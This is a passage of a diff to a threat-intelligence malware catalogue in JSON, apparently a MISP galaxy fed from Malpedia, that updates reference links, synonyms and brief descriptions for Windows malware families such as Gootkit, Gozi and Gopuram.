- "dest-uuid": "1e912590-c879-4a9c-81b9-2d31e82ac718",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "9a3429d7-e4a8-43c5-8786-0b3a1c841a5f",
"value": "GoldMax"
},
@@ -24915,11 +26377,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.gold_dragon",
- "https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite",
- "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Kuo-We-Are-About-To-Land-How-CloudDragon-Turns-A-Nightmare-Into-Reality.pdf",
+ "https://blog.talosintelligence.com/2021/11/kimsuky-abuses-blogs-delivers-malware.html",
"https://www.youtube.com/watch?v=rfzmHjZX70s",
"https://asec.ahnlab.com/en/31089/",
- "https://blog.talosintelligence.com/2021/11/kimsuky-abuses-blogs-delivers-malware.html"
+ "https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite",
+ "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Kuo-We-Are-About-To-Land-How-CloudDragon-Turns-A-Nightmare-Into-Reality.pdf"
],
"synonyms": [
"Lovexxx"
@@ -24960,8 +26422,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.gomorrah_stealer",
- "https://github.com/jstrosch/malware-samples/tree/master/binaries/gomorrah/2020/April",
- "https://twitter.com/vxunderground/status/1469713783308357633"
+ "https://twitter.com/vxunderground/status/1469713783308357633",
+ "https://github.com/jstrosch/malware-samples/tree/master/binaries/gomorrah/2020/April"
],
"synonyms": [],
"type": []
@@ -24974,9 +26436,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.goodor",
- "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks",
"https://norfolkinfosec.com/a-new-look-at-old-dragonfly-malware-goodor/",
- "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control"
+ "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control",
+ "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks"
],
"synonyms": [
"Fuerboos"
@@ -25013,45 +26475,47 @@
"value": "GooPic Drooper"
},
{
- "description": "Gootkit is a banking trojan, where large parts are written in javascript (node.JS). It jumps to C/C++-library functions for various tasks.",
+ "description": "Gootkit is a banking trojan consisting of an x86 loader and a payload embedding nodejs as well as a set of js scripts. The loader downloads the payload, stores it in registry and injects it in a copy of the loader process. The loader also contains two encrypted DLLs intended to be injected into each browser process launched in order to place the payload in man in the browser and allow it to apply the webinjects received from the command and control server on HTTPx exchanges. This allows Gootkit to intercept HTTPx requests and responses, steal their content or modify it according to the webinjects.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.gootkit",
- "https://labs.sentinelone.com/gootkit-banking-trojan-deep-dive-anti-analysis-features/",
- "https://www.certego.net/en/news/malware-tales-gootkit/",
- "https://www.youtube.com/watch?v=242Tn0IL2jE",
- "https://dannyquist.github.io/gootkit-reversing-ghidra/",
- "https://www.s21sec.com/en/blog/2016/05/reverse-engineering-gootkit/",
- "https://www.us-cert.gov/ncas/alerts/TA16-336A",
- "https://blog.malwarebytes.com/threat-analysis/2020/11/german-users-targeted-with-gootkit-banker-or-revil-ransomware/",
- "https://www.sentinelone.com/blog/gootkit-banking-trojan-deep-dive-anti-analysis-features/",
- "https://securityintelligence.com/gootkit-bobbing-and-weaving-to-avoid-prying-eyes/",
- "https://connect.ed-diamond.com/MISC/MISC-100/Analyse-du-malware-bancaire-Gootkit-et-de-ses-mecanismes-de-protection",
- "https://www.trendmicro.com/en_us/research/20/l/investigating-the-gootkit-loader.html",
- "https://www.youtube.com/watch?v=QgUlPvEE4aw",
- "https://www.sentinelone.com/blog/gootkit-banking-trojan-persistence-other-capabilities/",
- "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/",
- "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
- "https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/",
- "http://blog.cert.societegenerale.com/2015/04/analyzing-gootkits-persistence-mechanism.html",
- "https://securelist.com/gootkit-the-cautious-trojan/102731/",
- "https://news.sophos.com/en-us/2021/03/01/gootloader-expands-its-payload-delivery-options/?cmp=30728",
- "https://news.drweb.com/show/?i=4338&lng=en",
- "https://www.f5.com/labs/articles/threat-intelligence/tackling-gootkit-s-traps",
- "http://www.vkremez.com/2018/04/lets-learn-in-depth-dive-into-gootkit.html",
- "https://securityintelligence.com/gootkit-developers-dress-it-up-with-web-traffic-proxy/",
- "https://twitter.com/jhencinski/status/1464268732096815105",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
- "https://blogs.blackberry.com/en/2020/04/threat-spotlight-gootkit-banking-trojan",
- "https://blogs.blackberry.com/en/2021/11/revil-under-the-microscope",
- "https://twitter.com/MsftSecIntel/status/1366542130731094021",
- "https://resource.redcanary.com/rs/003-YRU-314/images/2022_ThreatDetectionReport_RedCanary.pdf",
- "https://dissectingmalwa.re/nicht-so-goot-breaking-down-gootkit-and-jasper-ftcode.html",
- "https://securelist.com/blog/research/76433/inside-the-gootkit-cc-server/",
- "https://www.trendmicro.com/en_us/research/22/g/gootkit-loaders-updated-tactics-and-fileless-delivery-of-cobalt-strike.html",
"https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/master/Delivery/Gootkit-malware.md",
+ "https://securelist.com/gootkit-the-cautious-trojan/102731/",
+ "https://www.trendmicro.com/en_us/research/22/g/gootkit-loaders-updated-tactics-and-fileless-delivery-of-cobalt-strike.html",
+ "https://www.certego.net/en/news/malware-tales-gootkit/",
+ "https://www.trendmicro.com/en_us/research/20/l/investigating-the-gootkit-loader.html",
"http://blog.trendmicro.com/trendlabs-security-intelligence/fake-judicial-spam-leads-to-backdoor-with-fake-certificate-authority/",
- "https://forums.juniper.net/t5/Security-Now/New-Gootkit-Banking-Trojan-variant-pushes-the-limits-on-evasive/ba-p/319055"
+ "https://5556002.fs1.hubspotusercontent-na1.net/hubfs/5556002/2022%20PDF%20Download%20Assets/ADA%20Compliant%20pdfs/Reports/PUBLIC_Gootloader%20-%20Foreign%20Intelligence%20Service.pdf",
+ "https://securityintelligence.com/gootkit-developers-dress-it-up-with-web-traffic-proxy/",
+ "https://www.sentinelone.com/blog/gootkit-banking-trojan-deep-dive-anti-analysis-features/",
+ "https://www.sentinelone.com/blog/gootkit-banking-trojan-persistence-other-capabilities/",
+ "https://blogs.blackberry.com/en/2021/11/revil-under-the-microscope",
+ "https://dissectingmalwa.re/nicht-so-goot-breaking-down-gootkit-and-jasper-ftcode.html",
+ "https://twitter.com/MsftSecIntel/status/1366542130731094021",
+ "https://www.trendmicro.com/en_us/research/23/a/gootkit-loader-actively-targets-the-australian-healthcare-indust.html",
+ "https://blog.malwarebytes.com/threat-analysis/2020/11/german-users-targeted-with-gootkit-banker-or-revil-ransomware/",
+ "https://www.youtube.com/watch?v=QgUlPvEE4aw",
+ "https://securelist.com/blog/research/76433/inside-the-gootkit-cc-server/",
+ "https://www.youtube.com/watch?v=242Tn0IL2jE",
+ "https://connect.ed-diamond.com/MISC/MISC-100/Analyse-du-malware-bancaire-Gootkit-et-de-ses-mecanismes-de-protection",
+ "https://dannyquist.github.io/gootkit-reversing-ghidra/",
+ "https://news.drweb.com/show/?i=4338&lng=en",
+ "https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/",
+ "https://securityintelligence.com/gootkit-bobbing-and-weaving-to-avoid-prying-eyes/",
+ "https://forums.juniper.net/t5/Security-Now/New-Gootkit-Banking-Trojan-variant-pushes-the-limits-on-evasive/ba-p/319055",
+ "https://blogs.blackberry.com/en/2020/04/threat-spotlight-gootkit-banking-trojan",
+ "http://www.vkremez.com/2018/04/lets-learn-in-depth-dive-into-gootkit.html",
+ "https://www.s21sec.com/en/blog/2016/05/reverse-engineering-gootkit/",
+ "https://resource.redcanary.com/rs/003-YRU-314/images/2022_ThreatDetectionReport_RedCanary.pdf",
+ "http://blog.cert.societegenerale.com/2015/04/analyzing-gootkits-persistence-mechanism.html",
+ "https://twitter.com/jhencinski/status/1464268732096815105",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://www.f5.com/labs/articles/threat-intelligence/tackling-gootkit-s-traps",
+ "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/",
+ "https://labs.sentinelone.com/gootkit-banking-trojan-deep-dive-anti-analysis-features/",
+ "https://www.us-cert.gov/ncas/alerts/TA16-336A",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
+ "https://news.sophos.com/en-us/2021/03/01/gootloader-expands-its-payload-delivery-options/?cmp=30728"
],
"synonyms": [
"Waldek",
@@ -25060,15 +26524,6 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "07ffcf9f-b9c0-4b22-af4b-78527427e6f5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "329efac7-922e-4d8b-90a9-4a87c3281753",
"value": "GootKit"
},
@@ -25086,6 +26541,20 @@
"uuid": "fb2e42bf-6845-4eb3-9fe7-85a447762bce",
"value": "Gophe"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gopuram",
+ "https://twitter.com/kucher1n/status/1642886340105601029?t=3GCn-ZhDjqWEMXya_PKseg",
+ "https://securelist.com/gopuram-backdoor-deployed-through-3cx-supply-chain-attack/109344"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "6dc4e71e-7372-4287-bdee-04da17a0d275",
+ "value": "Gopuram"
+ },
{
"description": "",
"meta": {
@@ -25117,23 +26586,25 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.gozi",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
"https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
- "https://securelist.com/financial-cyberthreats-in-2020/101638/",
- "https://therecord.media/gozi-malware-gang-member-arrested-in-colombia/",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "http://blog.malwaremustdie.org/2013/02/the-infection-of-styx-exploit-kit.html",
- "https://www.secureworks.com/research/threat-profiles/gold-swathmore",
- "https://www.youtube.com/watch?v=BcFbkjUVc7o",
- "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/",
"https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/",
- "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
- "https://github.com/mlodic/ursnif_beacon_decryptor",
- "https://lokalhost.pl/gozi_tree.txt",
- "https://blog.gdatasoftware.com/2016/11/29325-analysis-ursnif-spying-on-your-data-since-2007",
- "http://researchcenter.paloaltonetworks.com/2017/02/unit42-banking-trojans-ursnif-global-distribution-networks-identified/",
+ "https://therecord.media/gozi-malware-gang-member-arrested-in-colombia/",
"https://www.secureworks.com/research/gozi",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/"
+ "https://lokalhost.pl/gozi_tree.txt",
+ "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
+ "https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/gozi-italian-shellcode-dance",
+ "https://medium.com/csis-techblog/chapter-1-from-gozi-to-isfb-the-history-of-a-mythical-malware-family-82e592577fef",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://www.youtube.com/watch?v=BcFbkjUVc7o",
+ "https://github.com/mlodic/ursnif_beacon_decryptor",
+ "https://www.secureworks.com/research/threat-profiles/gold-swathmore",
+ "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/",
+ "https://securelist.com/financial-cyberthreats-in-2020/101638/",
+ "http://researchcenter.paloaltonetworks.com/2017/02/unit42-banking-trojans-ursnif-global-distribution-networks-identified/",
+ "https://blog.gdatasoftware.com/2016/11/29325-analysis-ursnif-spying-on-your-data-since-2007",
+ "http://blog.malwaremustdie.org/2013/02/the-infection-of-styx-exploit-kit.html",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf"
],
"synonyms": [
"CRM",
@@ -25152,10 +26623,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.gpcode",
- "https://www.symantec.com/security_response/writeup.jsp?docid=2007-071711-3132-99&tabid=2",
- "http://www.zdnet.com/article/whos-behind-the-gpcode-ransomware/",
"https://de.securelist.com/analysis/59479/erpresser/",
- "http://www.xylibox.com/2011/01/gpcode-ransomware-2010-simple-analysis.html"
+ "https://www.symantec.com/security_response/writeup.jsp?docid=2007-071711-3132-99&tabid=2",
+ "http://www.xylibox.com/2011/01/gpcode-ransomware-2010-simple-analysis.html",
+ "http://www.zdnet.com/article/whos-behind-the-gpcode-ransomware/"
],
"synonyms": [],
"type": []
@@ -25194,10 +26665,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.gramdoor",
- "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-055A_Iranian_Government-Sponsored_Actors_Conduct_Cyber_Operations.pdf",
- "https://www.mandiant.com/resources/telegram-malware-iranian-espionage",
"https://www.inforisktoday.com/muddywater-targets-critical-infrastructure-in-asia-europe-a-18611",
- "https://thehackernews.com/2022/02/irans-muddywater-hacker-group-using-new.html"
+ "https://thehackernews.com/2022/02/irans-muddywater-hacker-group-using-new.html",
+ "https://www.mandiant.com/resources/telegram-malware-iranian-espionage",
+ "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-055A_Iranian_Government-Sponsored_Actors_Conduct_Cyber_Operations.pdf"
],
"synonyms": [
"Small Sieve"
@@ -25212,15 +26683,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.grandoreiro",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/grandoreiro-banking-malware-resurfaces-for-tax-season",
- "http://www.interior.gob.es/prensa/noticias/-/asset_publisher/GHU8Ap6ztgsg/content/id/13552853",
+ "https://securelist.com/the-tetrade-brazilian-banking-malware/97779/",
"https://www.zscaler.com/blogs/security-research/grandoreiro-banking-trojan-new-ttps-targeting-various-industry-verticals",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/grandoreiro-banking-malware-resurfaces-for-tax-season",
"https://seguranca-informatica.pt/the-updated-grandoreiro-malware-equipped-with-latenbot-c2-features-in-q2-2020-now-extended-to-portuguese-banks",
+ "https://www.welivesecurity.com/2020/04/28/grandoreiro-how-engorged-can-exe-get/",
+ "http://www.interior.gob.es/prensa/noticias/-/asset_publisher/GHU8Ap6ztgsg/content/id/13552853",
"https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
"https://blueliv.com/resources/reports/MiniReport-Blueliv-Bancos-ESP-LAT.pdf",
- "https://therecord.media/spain-arrests-16-for-distributing-the-mekotio-and-grandoreiro-banking-trojans/",
- "https://www.welivesecurity.com/2020/04/28/grandoreiro-how-engorged-can-exe-get/",
- "https://securelist.com/the-tetrade-brazilian-banking-malware/97779/"
+ "https://therecord.media/spain-arrests-16-for-distributing-the-mekotio-and-grandoreiro-banking-trojans/"
],
"synonyms": [],
"type": []
@@ -25241,12 +26712,41 @@
"uuid": "626de4fc-cfa4-4fbc-ab35-4c9ab9fdec14",
"value": "GrandSteal"
},
+ {
+ "description": "This loader abuses the benign service Notion for data exchange.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.graphical_neutrino",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2023-0127.pdf",
+ "https://mrtiepolo.medium.com/sophisticated-apt29-campaign-abuses-notion-api-to-target-the-european-commission-200188059f58",
+ "https://blogs.blackberry.com/en/2023/03/nobelium-targets-eu-governments-assisting-ukraine"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "cb92a200-b4f0-4983-8d5d-6bf529b66da9",
+ "value": "GraphicalNeutrino"
+ },
+ {
+ "description": "Downloader / information stealer used by UAC-0056, observed since at least October 2022.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.graphiron",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/nodaria-ukraine-infostealer"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "968e330d-281e-4647-99fd-d9903aa6bbba",
+ "value": "Graphiron"
+ },
{
"description": "Trellix describes Graphite as a malware using the Microsoft Graph API and OneDrive for C&C. It was found being deployed in-memory only and served as a downloader for Empire.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.graphite",
- "https://www.trellix.com/en-gb/about/newsroom/stories/threat-labs/prime-ministers-office-compromised.html"
+ "https://www.trellix.com/en-gb/about/newsroom/stories/threat-labs/prime-ministers-office-compromised.html",
+ "https://blog.cluster25.duskrise.com/2022/09/23/in-the-footsteps-of-the-fancy-bear-powerpoint-graphite/"
],
"synonyms": [],
"type": []
@@ -25272,16 +26772,17 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.graphsteel",
- "https://www.cybercom.mil/Media/News/Article/3098856/cyber-national-mission-force-discloses-iocs-from-ukrainian-networks/",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war",
- "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview",
- "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/",
- "https://cert.gov.ua/article/38374",
- "https://www.intezer.com/blog/research/elephant-malware-targeting-ukrainian-orgs/",
- "https://www.govinfosecurity.com/cyber-espionage-actor-deploying-malware-using-excel-a-18830",
"https://www.mandiant.com/resources/spear-phish-ukrainian-entities",
- "https://www.sentinelone.com/blog/threat-actor-uac-0056-targeting-ukraine-with-fake-translation-software/"
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/",
+ "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya",
+ "https://www.intezer.com/blog/research/elephant-malware-targeting-ukrainian-orgs/",
+ "https://www.sentinelone.com/blog/threat-actor-uac-0056-targeting-ukraine-with-fake-translation-software/",
+ "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview",
+ "https://cert.gov.ua/article/38374",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war",
+ "https://www.govinfosecurity.com/cyber-espionage-actor-deploying-malware-using-excel-a-18830",
+ "https://businessinsights.bitdefender.com/deep-dive-into-the-elephant-framework-a-new-cyber-threat-in-ukraine",
+ "https://www.cybercom.mil/Media/News/Article/3098856/cyber-national-mission-force-discloses-iocs-from-ukrainian-networks/"
],
"synonyms": [],
"type": []
@@ -25294,16 +26795,16 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.grateful_pos",
- "http://www.vkremez.com/2017/12/lets-learn-reversing-grateful-point-of.html",
- "https://norfolkinfosec.com/pos-malware-used-at-fuel-pumps/",
"https://content.fireeye.com/m-trends/rpt-m-trends-2020",
- "https://usa.visa.com/dam/VCOM/global/support-legal/documents/cybercrime-groups-targeting-fuel-dispenser-merchants.pdf",
- "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf",
"https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://redcanary.com/blog/frameworkpos-and-the-adequate-persistent-threat/",
"http://www.secureworks.com/research/threat-profiles/gold-franklin",
"https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://community.rsa.com/community/products/netwitness/blog/2017/12/08/gratefulpos-credit-card-stealing-malware-just-in-time-for-the-shopping-season"
+ "https://redcanary.com/blog/frameworkpos-and-the-adequate-persistent-threat/",
+ "https://usa.visa.com/dam/VCOM/global/support-legal/documents/cybercrime-groups-targeting-fuel-dispenser-merchants.pdf",
+ "https://community.rsa.com/community/products/netwitness/blog/2017/12/08/gratefulpos-credit-card-stealing-malware-just-in-time-for-the-shopping-season",
+ "https://norfolkinfosec.com/pos-malware-used-at-fuel-pumps/",
+ "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf",
+ "http://www.vkremez.com/2017/12/lets-learn-reversing-grateful-point-of.html"
],
"synonyms": [
"FrameworkPOS",
@@ -25333,8 +26834,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.gravity_rat",
"https://www.virusbulletin.com/blog/2018/04/gravityrat-malware-takes-your-systems-temperature/",
- "https://securelist.com/gravityrat-the-spy-returns/99097/",
"https://blog.talosintelligence.com/2018/04/gravityrat-two-year-evolution-of-apt.html",
+ "https://securelist.com/gravityrat-the-spy-returns/99097/",
"https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/"
],
"synonyms": [],
@@ -25348,6 +26849,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.grease",
+ "https://labs.withsecure.com/content/dam/labs/docs/WithSecure-Lazarus-No-Pineapple-Threat-Intelligence-Report-2023.pdf",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-301a",
"https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/"
],
"synonyms": [],
@@ -25376,15 +26879,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.grey_energy",
- "https://www.nozominetworks.com/2019/02/12/blog/greyenergy-malware-research-paper-maldoc-to-backdoor/",
- "https://blog.nviso.eu/2022/02/24/threat-update-ukraine-russia-tensions/",
- "https://www.welivesecurity.com/wp-content/uploads/2018/10/ESET_GreyEnergy.pdf",
"https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf",
- "https://securelist.com/greyenergys-overlap-with-zebrocy/89506/",
- "https://attack.mitre.org/groups/G0034",
- "https://github.com/NozomiNetworks/greyenergy-unpacker",
"https://www.secureworks.com/research/threat-profiles/iron-viking",
- "https://www.eset.com/int/greyenergy-exposed/"
+ "https://blog.nviso.eu/2022/02/24/threat-update-ukraine-russia-tensions/",
+ "https://securelist.com/greyenergys-overlap-with-zebrocy/89506/",
+ "https://github.com/NozomiNetworks/greyenergy-unpacker",
+ "https://www.welivesecurity.com/wp-content/uploads/2018/10/ESET_GreyEnergy.pdf",
+ "https://www.eset.com/int/greyenergy-exposed/",
+ "https://www.nozominetworks.com/2019/02/12/blog/greyenergy-malware-research-paper-maldoc-to-backdoor/",
+ "https://attack.mitre.org/groups/G0034"
],
"synonyms": [],
"type": []
@@ -25397,8 +26900,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.grillmark",
- "https://content.fireeye.com/m-trends/rpt-m-trends-2019",
- "https://securelist.com/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back/69567/"
+ "https://securelist.com/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back/69567/",
+ "https://content.fireeye.com/m-trends/rpt-m-trends-2019"
],
"synonyms": [
"Hellsing Backdoor"
@@ -25413,10 +26916,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.grimagent",
- "https://www.mandiant.com/resources/fin12-ransomware-intrusion-actor-pursuing-healthcare-targets",
- "https://blog.group-ib.com/grimagent",
"https://twitter.com/bryceabdo/status/1352359414746009608",
- "https://gibnc.group-ib.com/s/Group-IB_GrimAgent_analysis#pdfviewer"
+ "https://gibnc.group-ib.com/s/Group-IB_GrimAgent_analysis#pdfviewer",
+ "https://www.mandiant.com/resources/fin12-ransomware-intrusion-actor-pursuing-healthcare-targets",
+ "https://blog.group-ib.com/grimagent"
],
"synonyms": [],
"type": []
@@ -25429,17 +26932,18 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.grimplant",
- "https://www.cybercom.mil/Media/News/Article/3098856/cyber-national-mission-force-discloses-iocs-from-ukrainian-networks/",
+ "https://www.mandiant.com/resources/spear-phish-ukrainian-entities",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/",
+ "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya",
+ "https://www.intezer.com/blog/research/elephant-malware-targeting-ukrainian-orgs/",
+ "https://www.sentinelone.com/blog/threat-actor-uac-0056-targeting-ukraine-with-fake-translation-software/",
+ "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview",
+ "https://cert.gov.ua/article/38374",
"https://blog.malwarebytes.com/threat-intelligence/2022/04/new-uac-0056-activity-theres-a-go-elephant-in-the-room/",
"https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war",
- "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview",
- "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/",
- "https://cert.gov.ua/article/38374",
- "https://www.intezer.com/blog/research/elephant-malware-targeting-ukrainian-orgs/",
"https://www.govinfosecurity.com/cyber-espionage-actor-deploying-malware-using-excel-a-18830",
- "https://www.mandiant.com/resources/spear-phish-ukrainian-entities",
- "https://www.sentinelone.com/blog/threat-actor-uac-0056-targeting-ukraine-with-fake-translation-software/"
+ "https://businessinsights.bitdefender.com/deep-dive-into-the-elephant-framework-a-new-cyber-threat-in-ukraine",
+ "https://www.cybercom.mil/Media/News/Article/3098856/cyber-national-mission-force-discloses-iocs-from-ukrainian-networks/"
],
"synonyms": [],
"type": []
@@ -25465,9 +26969,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.grunt",
- "https://www.telsy.com/download/5776/?uid=aca91e397e",
"https://blog.talosintelligence.com/2020/02/building-bypass-with-msbuild.html",
"https://twitter.com/ItsReallyNick/status/1208141697282117633",
+ "https://www.telsy.com/download/5776/?uid=aca91e397e",
+ "https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f",
"https://ti.qianxin.com/blog/articles/Suspected-Russian-speaking-attackers-use-COVID19-vaccine-decoys-against-Middle-East/"
],
"synonyms": [],
@@ -25507,8 +27012,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.gwisin",
- "https://www.skshieldus.com/download/files/download.do?o_fname=%EA%B7%80%EC%8B%A0(Gwisin)%20%EB%9E%9C%EC%84%AC%EC%9B%A8%EC%96%B4%20%EA%B3%B5%EA%B2%A9%20%EC%A0%84%EB%9E%B5%20%EB%B6%84%EC%84%9D%20%EB%A6%AC%ED%8F%AC%ED%8A%B8.pdf&r_fname=20220824150111854.pdf",
- "https://asec.ahnlab.com/en/37483"
+ "https://asec.ahnlab.com/en/37483",
+ "https://asec.ahnlab.com/en/41565/",
+ "https://www.skshieldus.com/download/files/download.do?o_fname=%EA%B7%80%EC%8B%A0(Gwisin)%20%EB%9E%9C%EC%84%AC%EC%9B%A8%EC%96%B4%20%EA%B3%B5%EA%B2%A9%20%EC%A0%84%EB%9E%B5%20%EB%B6%84%EC%84%9D%20%EB%A6%AC%ED%8F%AC%ED%8A%B8.pdf&r_fname=20220824150111854.pdf"
],
"synonyms": [],
"type": []
@@ -25534,8 +27040,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.habitsrat",
- "https://www.intezer.com/blog/malware-analysis/habitsrat-used-to-target-linux-and-windows-servers/",
- "https://www.intezer.com/blog/malware-analysis/habitsrat-used-to-target-linux-and-windows-servers"
+ "https://www.intezer.com/blog/malware-analysis/habitsrat-used-to-target-linux-and-windows-servers",
+ "https://www.intezer.com/blog/malware-analysis/habitsrat-used-to-target-linux-and-windows-servers/"
],
"synonyms": [],
"type": []
@@ -25574,23 +27080,23 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.hades",
- "https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox",
"https://www.sentinelone.com/wp-content/uploads/2022/02/S1_-SentinelLabs_SanctionsBeDamned_final_02.pdf",
